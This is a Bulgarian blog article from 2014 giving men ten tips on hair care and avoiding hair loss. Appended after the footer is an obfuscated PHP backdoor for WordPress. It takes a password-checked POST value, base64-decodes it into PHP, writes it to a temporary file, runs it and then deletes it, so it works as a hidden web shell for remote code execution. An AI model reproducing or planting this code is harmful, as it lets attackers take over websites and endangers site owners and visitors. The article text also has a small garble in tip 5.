Как мъжете да се грижат за косата си, за да избегнат косопада | Косопад

Как мъжете да се грижат за косата си, за да избегнат косопада

Едно от най- големите притеснения, свързани с външния вид при мъжете, е косата. Не винаги поддържаната коса може да избегне косопада, но в много случаи правилните грижи могат да я спасят от него.

мъже

Ето някои съвети към мъжете, ако искат да опазят косата си за дълго време:

1 . Косата, също като кожата, се уврежда от силната температура. Не я мийте с много топла вода. Сушенето най- добре с хавлия или на въздух. Не е препоръчително, но ако трябва да използвате сешоар, да е със студен въздух.

2 . Храненето ни се отразява на състоянието на косата. Има дълъг списък от храни, които са полезни за косата. Но помнете, че месото е сред най- големите ви съюзници, тъй като е източник на протеини.

3 . Мийте си косата редовно, може и всеки ден – не е проблем, стига да използвате мек и подходящ шампоан.

4 . Не чешете с нокти косата си.

5 . Балсамът ще помогне косата ви да изглежда добре, да е с блясък, с обем и да е мека. Достатъчно е да го използвате 2- мъже13 пъти седмично. Не го нанасяйте в корените, а по върховете.

6 . Гелът и пяната няма да ви помогнат да имате здрава коса. Все пак е ясно, че понякога трябва да го използваме. Затова, когато го нанасяте, не го слагайте в корените, а само по върховете. Така кожата че може да диша

7 . Ако имате косопад, не е задължително да е наследствен – може да е заради неправилно хранене, стрес и др. Има храни и добавки срещу косопад, които ще го намалят – например, бирена мая.

8 . Може да се обърнете към дерматолог за вашия случай на алопеция.

9 . Масажът на кожата на главата е чудесен начин да увеличите кръвообращението в зоната.

10. Тютюнопушенето е свързано с косопада, така че, ако искате да избегнете загубата на коса, спрете цигарите.

24. януари 2014 17:09:13 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}